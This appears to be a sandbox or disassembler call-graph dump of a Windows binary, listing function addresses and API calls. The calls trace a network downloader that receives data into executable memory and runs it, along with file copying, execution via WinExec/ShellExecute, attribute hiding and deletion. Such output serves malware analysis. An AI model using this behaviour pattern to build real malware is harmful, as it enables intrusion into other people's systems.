d904d3 VirtualAlloc 72436->72437 72439 d90a9c 72436->72439 72440 d904ec 72437->72440 72438->72436 72438->72439 72440->72439 72444 10015df0 72440->72444 72443 d9029b 72442->72443 72443->72435 72452 10015820 72444->72452 72447 10015e20 CloseHandle exit 72449 10015e6e 72447->72449 72448 10015e37 GetCurrentThread WaitForSingleObject CreateThread 72510 10015490 WSAStartup getaddrinfo 72448->72510 72698 1000b570 72448->72698 72449->72439 72453 10015860 72452->72453 72528 10015750 GetModuleFileNameA 72453->72528 72455 10015876 72540 10015450 72455->72540 72459 100158d2 72546 10002cb0 72459->72546 72461 10015973 72462 1001597b 72461->72462 72466 100159a2 _Smanip _Error_objects 72461->72466 72463 10002cb0 _invalid_parameter_noinfo_noreturn 72462->72463 72464 1001598a 72463->72464 72465 10002cb0 _invalid_parameter_noinfo_noreturn 72464->72465 72467 1001599c CreateMutexA GetLastError 72465->72467 72549 10012640 72466->72549 72467->72447 72467->72448 72471 10015b57 _Smanip _Error_objects 72472 10012640 9 API calls 72471->72472 72473 10015bda 72472->72473 72474 10005400 9 API calls 72473->72474 72475 10015bf1 72474->72475 72559 10013890 72475->72559 72478 10002cb0 _invalid_parameter_noinfo_noreturn 72479 10015c42 72478->72479 72562 10012620 72479->72562 72482 10002cb0 _invalid_parameter_noinfo_noreturn 72483 10015c60 72482->72483 72484 10012620 _invalid_parameter_noinfo_noreturn 72483->72484 72485 10015c6f memset 72484->72485 72565 10002b60 72485->72565 72487 10015cc0 ShellExecuteExA 72488 10015d13 72487->72488 72489 10015ceb 72487->72489 72492 10002cb0 _invalid_parameter_noinfo_noreturn 72488->72492 72490 10015d11 72489->72490 72491 10015cf4 WaitForSingleObject CloseHandle 72489->72491 72495 10015700 9 API calls 72490->72495 72491->72490 72493 10015d22 72492->72493 72494 10002cb0 _invalid_parameter_noinfo_noreturn 72493->72494 72496 10015d31 72494->72496 72497 10015d55 72495->72497 72498 10002cb0 _invalid_parameter_noinfo_noreturn 72496->72498 72500 10015d72 CopyFileA 72497->72500 72499 10015d43 72498->72499 72499->72467 72501 10002cb0 _invalid_parameter_noinfo_noreturn 72500->72501 72502 10015d84 ShellExecuteA 72501->72502 72567 10001660 34 API calls 72502->72567 72504 10015da4 72505 10002cb0 _invalid_parameter_noinfo_noreturn 72504->72505 72506 10015db3 72505->72506 72507 10002cb0 _invalid_parameter_noinfo_noreturn 72506->72507 72508 10015dc2 72507->72508 72509 10002cb0 _invalid_parameter_noinfo_noreturn 72508->72509 72509->72499 72511 10015509 WSACleanup exit 72510->72511 72523 10015522 72510->72523 72512 100156ed exit 72511->72512 72512->72449 72513 100155c5 freeaddrinfo 72517 100155d9 WSACleanup exit 72513->72517 72522 100155f2 72513->72522 72514 1001553d socket 72515 10015566 WSACleanup exit 72514->72515 72516 1001557f connect 72514->72516 72515->72512 72518 100155a3 closesocket 72516->72518 72519 100155be 72516->72519 72517->72512 72518->72523 72519->72513 72520 100155f9 recv 72521 10015671 72520->72521 72520->72522 72525 10015677 72521->72525 72526 1001567b closesocket WSACleanup free exit 72521->72526 72522->72520 72524 10015646 realloc 72522->72524 72527 100156b8 VirtualAlloc memcpy 72522->72527 72523->72513 72523->72514 72524->72522 72525->72527 72526->72512 72527->72512 72568 10002da0 72528->72568 72533 100157b7 72576 10002ad0 72533->72576 72536 100157e9 72538 10002cb0 _invalid_parameter_noinfo_noreturn 72536->72538 72537 10002cb0 _invalid_parameter_noinfo_noreturn 72539 100157e4 72537->72539 72538->72539 72539->72455 72634 10015400 72540->72634 72543 10015700 GetModuleFileNameA 72544 10002da0 8 API calls 72543->72544 72545 10015733 72544->72545 72545->72459 72639 10003230 72546->72639 72548 10002cbf 72548->72461 72550 10012660 HandleT 72549->72550 72644 10013cd0 72550->72644 72552 10012699 72553 10005400 72552->72553 72554 10005431 _Error_objects 72553->72554 72655 100127e0 72554->72655 72556 10005455 HandleT 72557 1000549d 72556->72557 72662 100128b0 72556->72662 72557->72471 72669 10014400 72559->72669 72561 100138b2 72561->72478 72693 100130b0 72562->72693 72566 10002b6f Concurrency::task_continuation_context::task_continuation_context 72565->72566 72566->72487 72567->72504 72569 10002dd1 HandleT _Error_objects 72568->72569 72580 10003ee0 72569->72580 72571 10002dfa 72572 10002b10 72571->72572 72573 10002b22 Concurrency::task_continuation_context::task_continuation_context 72572->72573 72615 10003dc0 72573->72615 72575 10002b55 72575->72533 72575->72536 72577 10002ae8 _Error_objects 72576->72577 72623 100035a0 72577->72623 72581 10003ef7 Concurrency::task_continuation_context::task_continuation_context 72580->72581 72583 10003f01 Concurrency::task_continuation_context::task_continuation_context 72581->72583 72591 10001410 ?_Xlength_error@std@@YAXPBD 72581->72591 72584 10003f2b 72583->72584 72586 10003f77 Concurrency::task_continuation_context::task_continuation_context 72583->72586 72592 100036d0 memcpy 72584->72592 72593 100048e0 72586->72593 72588 10003f9e HandleT Concurrency::task_continuation_context::task_continuation_context 72596 100036d0 memcpy 72588->72596 72590 10003f4f HandleT _Error_objects Concurrency::task_continuation_context::task_continuation_context 72590->72571 72591->72583 72592->72590 72597 10004a70 72593->72597 72596->72590 72600 10004ac0 72597->72600 72601 10004ad0 allocator 72600->72601 72604 10004af0 72601->72604 72605 10004905 72604->72605 72606 10004afd 72604->72606 72605->72588 72607 10004b14 72606->72607 72608 10004b06 72606->72608 72611 10001350 72607->72611 72614 10004b70 6 API calls allocator 72608->72614 72612 10015fe6 allocator _callnewh malloc _CxxThrowException _CxxThrowException 72611->72612 72613 1000135c 72612->72613 72613->72605 72614->72605 72616 10003dd3 72615->72616 72620 10003e1f _Min_value 72615->72620 72616->72620 72621 10003e90 memset 72616->72621 72618 10003de8 72618->72620 72622 10004860 memchr _Min_value char_traits 72618->72622 72620->72575 72621->72618 72622->72620 72624 100035d5 72623->72624 72629 10003980 72624->72629 72626 100035ee Concurrency::task_continuation_context::task_continuation_context 72627 10003ee0 8 API calls 72626->72627 72628 10002afd 72627->72628 72628->72537 72630 10003992 72629->72630 72631 10003997 72629->72631 72633 10003a70 ?_Xout_of_range@std@@YAXPBD 72630->72633 72631->72626 72633->72631 72638 100153f0 72634->72638 72636 1001541d __stdio_common_vsprintf 72637 10015439 72636->72637 72637->72543 72638->72636 72640 10003247 _Error_objects Concurrency::task_continuation_context::task_continuation_context 72639->72640 72642 10003278 Concurrency::task_continuation_context::task_continuation_context 72640->72642 72643 10003910 _invalid_parameter_noinfo_noreturn allocator 72640->72643 72642->72548 72643->72642 72645 10013cf6 Concurrency::task_continuation_context::task_continuation_context 72644->72645 72651 10013d70 _Error_objects 72645->72651 72652 10014390 7 API calls 72645->72652 72647 10013d29 72653 10014ec0 memcpy HandleT 72647->72653 72649 10013d51 72654 10014230 _invalid_parameter_noinfo_noreturn 72649->72654 72651->72552 72652->72647 72653->72649 72654->72651 72656 100127f4 72655->72656 72657 100127f6 72655->72657 72656->72556 72657->72656 72658 1001280e 72657->72658 72660 1001283c Concurrency::task_continuation_context::task_continuation_context 72657->72660 72666 10013ed0 9 API calls 3 library calls 72658->72666 72660->72656 72667 100131d0 _invalid_parameter_noinfo_noreturn memcpy HandleT _Error_objects Concurrency::task_continuation_context::task_continuation_context 72660->72667 72663 10012914 72662->72663 72665 100128cd Concurrency::task_continuation_context::task_continuation_context 72662->72665 72668 10013fe0 9 API calls 3 library calls 72663->72668 72665->72556 72666->72656 72667->72656 72668->72665 72670 1001442c _Error_objects Concurrency::task_continuation_context::task_continuation_context 72669->72670 72671 100144c7 _Error_objects Concurrency::task_continuation_context::task_continuation_context 72670->72671 72672 10014518 Concurrency::task_continuation_context::task_continuation_context 72670->72672 72687 100036d0 memcpy 72671->72687 72674 100145d3 Concurrency::task_continuation_context::task_continuation_context 72672->72674 72676 10014568 HandleT _Error_objects 72672->72676 72679 100145ee Concurrency::task_continuation_context::task_continuation_context 72674->72679 72690 10001410 ?_Xlength_error@std@@YAXPBD 72674->72690 72688 100039e0 memcpy 72676->72688 72678 100145a9 Concurrency::task_continuation_context::task_continuation_context 72689 100036d0 memcpy 72678->72689 72680 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 72679->72680 72682 1001462d HandleT Concurrency::task_continuation_context::task_continuation_context 72680->72682 72691 100036d0 memcpy 72682->72691 72684 1001467a Concurrency::task_continuation_context::task_continuation_context 72692 100036d0 memcpy 72684->72692 72686 10014507 _Error_objects 72686->72561 72687->72686 72688->72678 72689->72686 72690->72679 72691->72684 72692->72686 72694 100130d6 _Error_objects Concurrency::task_continuation_context::task_continuation_context 72693->72694 72696 1001262f 72694->72696 72697 10003a90 _invalid_parameter_noinfo_noreturn allocator 72694->72697 72696->72482 72697->72696 72699 1000b5a8 72698->72699 72700 10002da0 8 API calls 72699->72700 72701 1000b5be 72700->72701 72938 10005540 GetModuleFileNameA 72701->72938 72703 1000b5d1 _Smanip _Error_objects 72704 10012640 9 API calls 72703->72704 72705 1000bc37 _Smanip _Error_objects 72704->72705 72706 10012640 9 API calls 72705->72706 72707 10010552 72706->72707 72708 10005400 9 API calls 72707->72708 72709 10010569 72708->72709 72710 10005400 9 API calls 72709->72710 72711 10010583 _Error_objects 72710->72711 72972 10004fe0 72711->72972 72715 100105da 72716 10002cb0 _invalid_parameter_noinfo_noreturn 72715->72716 72717 100105e5 72716->72717 72718 10004fe0 17 API calls 72717->72718 72719 100105f9 72718->72719 72720 10002cd0 _invalid_parameter_noinfo_noreturn 72719->72720 72721 10010614 72720->72721 72722 10002cb0 _invalid_parameter_noinfo_noreturn 72721->72722 72723 1001061f _Smanip _Error_objects 72722->72723 72724 10012640 9 API calls 72723->72724 72725 10010770 72724->72725 72726 10005400 9 API calls 72725->72726 72727 10010787 72726->72727 72728 10012620 _invalid_parameter_noinfo_noreturn 72727->72728 72729 10010799 72728->72729 73000 10002e20 72729->73000 72733 100107cb _Smanip _Error_objects 72734 10012640 9 API calls 72733->72734 72735 10010881 72734->72735 72736 10005400 9 API calls 72735->72736 72737 10010898 72736->72737 73011 100138d0 72737->73011 72739 100108cb 72740 10002cb0 _invalid_parameter_noinfo_noreturn 72739->72740 72741 100108dd 72740->72741 72742 10012620 _invalid_parameter_noinfo_noreturn 72741->72742 72743 100108ec 72742->72743 73014 10005520 DeleteFileA 72743->73014 72745 100108fe 72746 10002da0 8 API calls 72745->72746 72747 10010918 72746->72747 73016 10005300 72747->73016 72750 10002cb0 _invalid_parameter_noinfo_noreturn 72751 10010941 Sleep 72750->72751 72752 10010959 72751->72752 72753 10002da0 8 API calls 72752->72753 72754 10010965 _Smanip _Error_objects 72753->72754 72755 10012640 9 API calls 72754->72755 72756 100109da 72755->72756 72757 10005400 9 API calls 72756->72757 72758 100109f1 72757->72758 72759 10002e20 8 API calls 72758->72759 72760 10010a3b 72759->72760 72761 10005250 13 API calls 72760->72761 72762 10010a47 72761->72762 72763 10002cb0 _invalid_parameter_noinfo_noreturn 72762->72763 72764 10010a5f 72763->72764 72765 10012620 _invalid_parameter_noinfo_noreturn 72764->72765 72766 10010a6e 72765->72766 72767 10002cb0 _invalid_parameter_noinfo_noreturn 72766->72767 72768 10010a7d 72767->72768 72769 10002da0 8 API calls 72768->72769 72770 10010a95 _Smanip _Error_objects 72769->72770 72771 10012640 9 API calls 72770->72771 72772 10010b0e 72771->72772 72773 10005400 9 API calls 72772->72773 72774 10010b25 72773->72774 72775 10002e20 8 API calls 72774->72775 72776 10010b6f 72775->72776 72777 10005250 13 API calls 72776->72777 72778 10010b7b 72777->72778 72779 10002cd0 _invalid_parameter_noinfo_noreturn 72778->72779 72780 10010ba2 72779->72780 72781 10002cb0 _invalid_parameter_noinfo_noreturn 72780->72781 72782 10010bad 72781->72782 72783 10002cb0 _invalid_parameter_noinfo_noreturn 72782->72783 72784 10010bbc 72783->72784 72785 10012620 _invalid_parameter_noinfo_noreturn 72784->72785 72786 10010bcb 72785->72786 72787 10002cb0 _invalid_parameter_noinfo_noreturn 72786->72787 72788 10010bda 72787->72788 73027 100139a0 72788->73027 72792 10010c21 72793 10013a30 9 API calls 72792->72793 72794 10010c4f 72793->72794 72795 10013a30 9 API calls 72794->72795 72796 10010c7d 72795->72796 72797 10013a30 9 API calls 72796->72797 72798 10010cab 72797->72798 72799 10013a30 9 API calls 72798->72799 72800 10010cd9 72799->72800 72801 10013a30 9 API calls 72800->72801 72802 10010d07 72801->72802 72803 10013a30 9 API calls 72802->72803 72804 10010d35 72803->72804 72805 10013a30 9 API calls 72804->72805 72806 10010d63 72805->72806 72807 10013a30 9 API calls 72806->72807 72808 10010d91 72807->72808 72809 10013a30 9 API calls 72808->72809 72810 10010dbf 72809->72810 72811 10013a30 9 API calls 72810->72811 72812 10010ded 72811->72812 72813 10002cb0 _invalid_parameter_noinfo_noreturn 72812->72813 72814 10010dff 72813->72814 72815 10002cb0 _invalid_parameter_noinfo_noreturn 72814->72815 72816 10010e0e 72815->72816 72817 10002cb0 _invalid_parameter_noinfo_noreturn 72816->72817 72818 10010e1d 72817->72818 72819 10002cb0 _invalid_parameter_noinfo_noreturn 72818->72819 72820 10010e2c 72819->72820 72821 10002cb0 _invalid_parameter_noinfo_noreturn 72820->72821 72822 10010e3b 72821->72822 72823 10002cb0 _invalid_parameter_noinfo_noreturn 72822->72823 72824 10010e4a 72823->72824 72825 10002cb0 _invalid_parameter_noinfo_noreturn 72824->72825 72826 10010e59 72825->72826 72827 10002cb0 _invalid_parameter_noinfo_noreturn 72826->72827 72828 10010e68 72827->72828 72829 10002cb0 _invalid_parameter_noinfo_noreturn 72828->72829 72830 10010e77 72829->72830 72831 10002cb0 _invalid_parameter_noinfo_noreturn 72830->72831 72832 10010e86 72831->72832 72833 10002cb0 _invalid_parameter_noinfo_noreturn 72832->72833 72834 10010e95 72833->72834 72835 10005520 DeleteFileA 72834->72835 72836 10010ea7 72835->72836 72837 10002da0 8 API calls 72836->72837 72838 10010ec1 72837->72838 72839 10005300 31 API calls 72838->72839 72840 10010ed8 72839->72840 72841 10002cb0 _invalid_parameter_noinfo_noreturn 72840->72841 72842 10010eea Sleep 72841->72842 72843 10010f02 _Smanip _Error_objects 72842->72843 72844 10012640 9 API calls 72843->72844 72845 10011151 72844->72845 72846 10005400 9 API calls 72845->72846 72847 10011168 _Smanip _Error_objects 72846->72847 72848 10012640 9 API calls 72847->72848 72849 1001120e 72848->72849 72850 10005400 9 API calls 72849->72850 72851 10011225 72850->72851 72852 10013890 9 API calls 72851->72852 72853 10011264 72852->72853 72854 10002cb0 _invalid_parameter_noinfo_noreturn 72853->72854 72855 10011276 72854->72855 72856 10012620 _invalid_parameter_noinfo_noreturn 72855->72856 72857 10011285 72856->72857 72858 10002cb0 _invalid_parameter_noinfo_noreturn 72857->72858 72859 10011294 72858->72859 72860 10012620 _invalid_parameter_noinfo_noreturn 72859->72860 72861 100112a3 72860->72861 72862 100112b1 WinExec 72861->72862 72863 100112c4 _Smanip _Error_objects 72862->72863 72864 10012640 9 API calls 72863->72864 72865 100113fd 72864->72865 72866 10005400 9 API calls 72865->72866 72867 10011414 72866->72867 72868 10012620 _invalid_parameter_noinfo_noreturn 72867->72868 72869 10011426 _Smanip _Error_objects 72868->72869 72870 10012640 9 API calls 72869->72870 72871 100114b9 72870->72871 72872 10005400 9 API calls 72871->72872 72873 100114d0 72872->72873 73036 10003bc0 72873->73036 72875 10011503 73039 10003b90 72875->73039 72877 10011542 72878 10002cd0 _invalid_parameter_noinfo_noreturn 72877->72878 72879 1001155d 72878->72879 72880 10002cb0 _invalid_parameter_noinfo_noreturn 72879->72880 72881 10011568 72880->72881 72882 10002cb0 _invalid_parameter_noinfo_noreturn 72881->72882 72883 10011577 72882->72883 72884 10002cb0 _invalid_parameter_noinfo_noreturn 72883->72884 72885 10011586 72884->72885 72886 10012620 _invalid_parameter_noinfo_noreturn 72885->72886 72887 10011595 72886->72887 72888 100115a3 WinExec Sleep 72887->72888 72889 100115c1 72888->72889 72890 10002da0 8 API calls 72889->72890 72891 100115cd 72890->72891 73042 10005740 72891->73042 72893 100115dd 72894 10002cb0 _invalid_parameter_noinfo_noreturn 72893->72894 72895 100115ef 72894->72895 72896 10002da0 8 API calls 72895->72896 72897 10011607 72896->72897 72898 10005740 SetFileAttributesA 72897->72898 72899 10011617 72898->72899 72900 10002cb0 _invalid_parameter_noinfo_noreturn 72899->72900 72901 10011629 72900->72901 72902 10005520 DeleteFileA 72901->72902 72903 1001163b 72902->72903 72904 10005520 DeleteFileA 72903->72904 72905 1001164f 72904->72905 72906 10002cb0 _invalid_parameter_noinfo_noreturn 72905->72906 72907 1001166b 72906->72907 72908 10002cb0 _invalid_parameter_noinfo_noreturn 72907->72908 72909 1001167a 72908->72909 72910 10002cb0 _invalid_parameter_noinfo_noreturn 72909->72910 72911 10011689 72910->72911 72912 10002cb0 _invalid_parameter_noinfo_noreturn 72911->72912 72913 10011698 72912->72913 72914 10002cb0 _invalid_parameter_noinfo_noreturn 72913->72914 72915 100116a7 72914->72915 72916 10002cb0 _invalid_parameter_noinfo_noreturn 72915->72916 72917 100116b6 72916->72917 72918 10002cb0 _invalid_parameter_noinfo_noreturn 72917->72918 72919 100116c5 72918->72919 72920 10002cb0 _invalid_parameter_noinfo_noreturn 72919->72920 72921 100116d4 72920->72921 72922 10002cb0 _invalid_parameter_noinfo_noreturn 72921->72922 72923 100116e3 72922->72923 72924 10002cb0 _invalid_parameter_noinfo_noreturn 72923->72924 72925 100116f2 72924->72925 72926 10002cb0 _invalid_parameter_noinfo_noreturn 72925->72926 72927 10011701 72926->72927 72928 10002cb0 _invalid_parameter_noinfo_noreturn 72927->72928 72929 10011710 72928->72929 72930 10012620 _invalid_parameter_noinfo_noreturn 72929->72930 72931 1001171f 72930->72931 72932 10012620 _invalid_parameter_noinfo_noreturn 72931->72932 72933 1001172e 72932->72933 72934 10002cb0 _invalid_parameter_noinfo_noreturn 72933->72934 72935 1001173d 72934->72935 72936 10002cb0 _invalid_parameter_noinfo_noreturn 72935->72936 72937 1001174f 72936->72937 72939 10002da0 8 API calls 72938->72939 72940 10005588 72939->72940 72941 10002ad0 9 API calls 72940->72941 72942 100055b6 72941->72942 72943 10002ad0 9 API calls 72942->72943 72944 100055cf 72943->72944 73045 10012730 72944->73045 72947 10002ad0 9 API calls 72948 100055fa 72947->72948 72949 10002ad0 9 API calls 72948->72949 72954 10005613 _Error_objects 72949->72954 72950 1000567a 73049 10013910 72950->73049 72954->72950 73055 10012a40 10 API calls 72954->73055 73056 10012a20 9 API calls Concurrency::task_continuation_context::task_continuation_context 72954->73056 72955 10003bc0 10 API calls 72957 100056b5 72955->72957 72958 10002cb0 _invalid_parameter_noinfo_noreturn 72957->72958 72959 100056d0 72958->72959 72960 10002cb0 _invalid_parameter_noinfo_noreturn 72959->72960 72961 100056dc 72960->72961 72962 10002cb0 _invalid_parameter_noinfo_noreturn 72961->72962 72963 100056eb 72962->72963 72964 10002cb0 _invalid_parameter_noinfo_noreturn 72963->72964 72965 100056fa 72964->72965 72966 10002cb0 _invalid_parameter_noinfo_noreturn 72965->72966 72967 10005706 72966->72967 72968 10002cb0 _invalid_parameter_noinfo_noreturn 72967->72968 72969 10005715 72968->72969 72970 10002cb0 _invalid_parameter_noinfo_noreturn 72969->72970 72971 10005724 72970->72971 72971->72703 72973 1000500a 72972->72973 73075 100125c0 72973->73075 72976 10005028 72978 100050db _Error_objects 72976->72978 73091 10012600 9 API calls 72976->73091 72977 100050c9 72977->72978 72979 100050f7 72977->72979 72980 1000512c 72977->72980 73081 100137c0 72978->73081 73092 10012600 9 API calls 72979->73092 73093 10012600 9 API calls 72980->73093 72984 1000515c 73094 10012600 9 API calls 72984->73094 72985 100051dd 73085 10004ee0 MultiByteToWideChar 72985->73085 72987 1000518a 72989 100051ef 72990 10002da0 8 API calls 72989->72990 72991 10005201 _MallocaArrayHolder 72990->72991 72992 10002cb0 _invalid_parameter_noinfo_noreturn 72991->72992 72993 1000522b 72992->72993 72994 10012620 _invalid_parameter_noinfo_noreturn 72993->72994 72995 1000523a 72994->72995 72996 10002cd0 72995->72996 72998 10002ce2 HandleT Concurrency::task_continuation_context::task_continuation_context 72996->72998 72997 10002cea 72997->72715 72998->72997 72999 10003230 _invalid_parameter_noinfo_noreturn 72998->72999 72999->72997 73001 10002e4c HandleT Concurrency::task_continuation_context::task_continuation_context 73000->73001 73099 10004020 73001->73099 73003 10002e9e 73004 10005250 73003->73004 73007 10005280 73004->73007 73006 100052c2 73009 10002cb0 _invalid_parameter_noinfo_noreturn 73006->73009 73007->73006 73113 10012780 73007->73113 73117 100129e0 11 API calls Concurrency::task_continuation_context::task_continuation_context 73007->73117 73010 100052e6 73009->73010 73010->72733 73118 100143c0 73011->73118 73013 100138e9 73013->72739 73015 10005531 73014->73015 73015->72745 73138 100124a0 73016->73138 73019 100053a7 73147 100053d0 73019->73147 73020 10005357 73023 1000536f ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J 73020->73023 73022 100053b9 73022->72750 73142 10012400 73023->73142 73025 10005395 73026 1000539f SetFileAttributesA 73025->73026 73026->73019 73028 100139b5 HandleT Concurrency::task_continuation_context::task_continuation_context 73027->73028 73029 100139e5 73028->73029 73226 10001410 ?_Xlength_error@std@@YAXPBD 73028->73226 73031 100146c0 7 API calls 73029->73031 73032 10010bf3 73031->73032 73033 10013a30 73032->73033 73034 100128b0 Concurrency::task_continuation_context::task_continuation_context 9 API calls 73033->73034 73035 10013a48 73034->73035 73035->72792 73227 10002c50 73036->73227 73038 10003bd7 73038->72875 73239 10002c20 73039->73239 73041 10003ba7 73041->72877 73043 10002b60 73042->73043 73044 10005750 SetFileAttributesA 73043->73044 73044->72893 73046 10012742 Concurrency::task_continuation_context::task_continuation_context 73045->73046 73057 10013e30 73046->73057 73050 10013925 Concurrency::task_continuation_context::task_continuation_context 73049->73050 73052 10013948 73050->73052 73072 10001410 ?_Xlength_error@std@@YAXPBD 73050->73072 73064 100146c0 73052->73064 73054 10005691 73054->72955 73055->72954 73056->72954 73058 100055e2 73057->73058 73060 10013e3e 73057->73060 73058->72947 73060->73058 73062 100049b0 memchr 73060->73062 73063 100049e0 memcmp 73060->73063 73062->73060 73063->73060 73065 100146ec HandleT Concurrency::task_continuation_context::task_continuation_context 73064->73065 73070 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 73065->73070 73071 10014782 HandleT Concurrency::task_continuation_context::task_continuation_context 73065->73071 73067 100147ca 73074 100036d0 memcpy 73067->73074 73069 100147e1 _Error_objects Concurrency::task_continuation_context::task_continuation_context 73069->73054 73070->73071 73073 100036d0 memcpy 73071->73073 73072->73052 73073->73067 73074->73069 73076 100125cf 73075->73076 73077 100125e6 73076->73077 73080 100125f3 73076->73080 73095 10013090 ?_Xlength_error@std@@YAXPBD 73076->73095 73096 10013b70 8 API calls Concurrency::task_continuation_context::task_continuation_context 73077->73096 73080->72976 73083 100137f5 HandleT 73081->73083 73082 10013832 _Error_objects 73082->72985 73083->73082 73097 10014ab0 9 API calls 2 library calls 73083->73097 73098 10016360 73085->73098 73087 10004f1b memset MultiByteToWideChar WideCharToMultiByte 73088 10016360 73087->73088 73089 10004f7e memset WideCharToMultiByte 73088->73089 73090 10004fc2 _MallocaArrayHolder 73089->73090 73090->72989 73091->72977 73092->72978 73093->72984 73094->72987 73095->73077 73096->73080 73097->73082 73100 10004037 Concurrency::task_continuation_context::task_continuation_context 73099->73100 73102 10004041 Concurrency::task_continuation_context::task_continuation_context 73100->73102 73110 10001410 ?_Xlength_error@std@@YAXPBD 73100->73110 73103 1000406b 73102->73103 73105 1000409b Concurrency::task_continuation_context::task_continuation_context 73102->73105 73111 100036d0 memcpy 73103->73111 73106 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 73105->73106 73107 100040c2 HandleT Concurrency::task_continuation_context::task_continuation_context 73106->73107 73112 100036d0 memcpy 73107->73112 73109 1000408d _Error_objects 73109->73003 73110->73102 73111->73109 73112->73109 73114 1001279a Concurrency::task_continuation_context::task_continuation_context 73113->73114 73115 10013e30 2 API calls 73114->73115 73116 100127ca 73115->73116 73116->73007 73117->73007 73119 100143da Concurrency::task_continuation_context::task_continuation_context 73118->73119 73122 100148c0 73119->73122 73123 10003980 ?_Xout_of_range@std@@YAXPBD 73122->73123 73124 100148db 73123->73124 73125 100149bc 73124->73125 73128 1001490e Concurrency::task_continuation_context::task_continuation_context 73124->73128 73137 10014ff0 9 API calls 3 library calls 73125->73137 73127 100143f1 73127->73013 73134 100039e0 memcpy 73128->73134 73130 10014980 73135 100036d0 memcpy 73130->73135 73132 10014994 73136 100036d0 memcpy 73132->73136 73134->73130 73135->73132 73136->73127 73137->73127 73139 100124bb 73138->73139 73150 10012f80 73139->73150 73196 10012f10 73142->73196 73145 10012434 73145->73025 73146 10012418 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 73146->73145 73216 10012440 73147->73216 73149 100053e2 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 73149->73022 73151 10012fd0 HandleT 73150->73151 73152 10012fab ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE 73150->73152 73153 10012fe0 ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N 73151->73153 73152->73151 73160 10013680 ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE 73153->73160 73157 1001304f 73158 10013053 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 73157->73158 73159 10005333 ??Bios_base@std@ 73157->73159 73158->73159 73159->73019 73159->73020 73172 10012e40 73160->73172 73163 100135c0 73164 100135eb ?_Fiopen@std@@YAPAU_iobuf@@PBDHH 73163->73164 73171 100135e7 73163->73171 73165 1001360d 73164->73165 73164->73171 73166 10012e40 3 API calls 73165->73166 73167 1001361b ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2 73166->73167 73178 10013a70 ??0_Lockit@std@@QAE@H ??Bid@locale@std@ 73167->73178 73169 10013642 73189 10012cd0 ?always_noconv@codecvt_base@std@ ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ HandleT 73169->73189 73171->73157 73173 10012e4f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 73172->73173 73175 10012e7f 73173->73175 73176 10012ede 73173->73176 73175->73176 73177 10012e88 _get_stream_buffer_pointers ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAPAD0PAH001 73175->73177 73176->73163 73177->73176 73190 10004cc0 73178->73190 73181 10013b47 ??1_Lockit@std@@QAE 73181->73169 73182 10013ad7 ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@ 73184 10013af5 73182->73184 73185 10013aed 73182->73185 73183 10013acf 73183->73181 73195 10015eef malloc ?_Xbad_alloc@std@ 73184->73195 73194 10004c10 _CxxThrowException std::bad_alloc::bad_alloc 73185->73194 73188 10013b14 73188->73181 73189->73171 73191 10004cd7 73190->73191 73192 10004d0c 73191->73192 73193 10004d11 ?_Getgloballocale@locale@std@@CAPAV_Locimp@12 73191->73193 73192->73181 73192->73182 73192->73183 73193->73192 73194->73183 73195->73188 73197 10012f22 73196->73197 73205 10012f5a 73196->73205 73206 10012c90 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 73197->73206 73199 10012e40 3 API calls 73201 10012414 73199->73201 73201->73145 73201->73146 73205->73199 73207 10012cc9 73206->73207 73208 10012caa ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 73206->73208 73209 10012d20 73207->73209 73208->73207 73210 10012d32 Concurrency::task_continuation_context::task_continuation_context 73209->73210 73215 10012d3d fclose 73209->73215 73211 10012d8a ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD 73210->73211 73210->73215 73212 10012dbf 73211->73212 73213 10012de1 fwrite 73212->73213 73212->73215 73214 10012e00 73213->73214 73213->73215 73214->73215 73215->73205 73219 10012390 73216->73219 73218 10012482 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE 73218->73149 73220 100123c6 73219->73220 73221 100123be 73219->73221 73223 100123db ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE 73220->73223 73224 10012f10 8 API calls 73220->73224 73222 10012c90 2 API calls 73221->73222 73222->73220 73223->73218 73225 100123da 73224->73225 73225->73223 73226->73029 73228 10002c6a Concurrency::task_continuation_context::task_continuation_context 73227->73228 73231 100032f0 73228->73231 73230 10002c7d 73230->73038 73232 10003310 Concurrency::task_continuation_context::task_continuation_context 73231->73232 73233 1000335d 73231->73233 73237 100039e0 memcpy 73232->73237 73238 10004150 9 API calls 3 library calls 73233->73238 73236 1000333b Concurrency::task_continuation_context::task_continuation_context 73236->73230 73237->73236 73238->73236 73240 10002c30 HandleT 73239->73240 73241 100032f0 10 API calls 73240->73241 73242 10002c49 73241->73242 73242->73041 73243 42866f SetErrorMode 73244 272f0df 73251 2712c60 WSAStartup CreateEventW InterlockedExchange 73244->73251 73246 2716f17 77 API calls 73247 272f0e4 73246->73247 73247->73246 73248 272f7db 73247->73248 73254 2715a20 CreateEventW 73248->73254 73282 2716815 73251->73282 73253 2712cff 73253->73247 73255 2715a79 73254->73255 73257 2715a83 73254->73257 73297 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73255->73297 73291 2716410 HeapCreate 73257->73291 73260 2715b12 73298 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73260->73298 73261 2715b1c CreateEventW 73263 2715b55 73261->73263 73264 2715b5f CreateEventW 73261->73264 73299 2711280 DeleteCriticalSection RaiseException 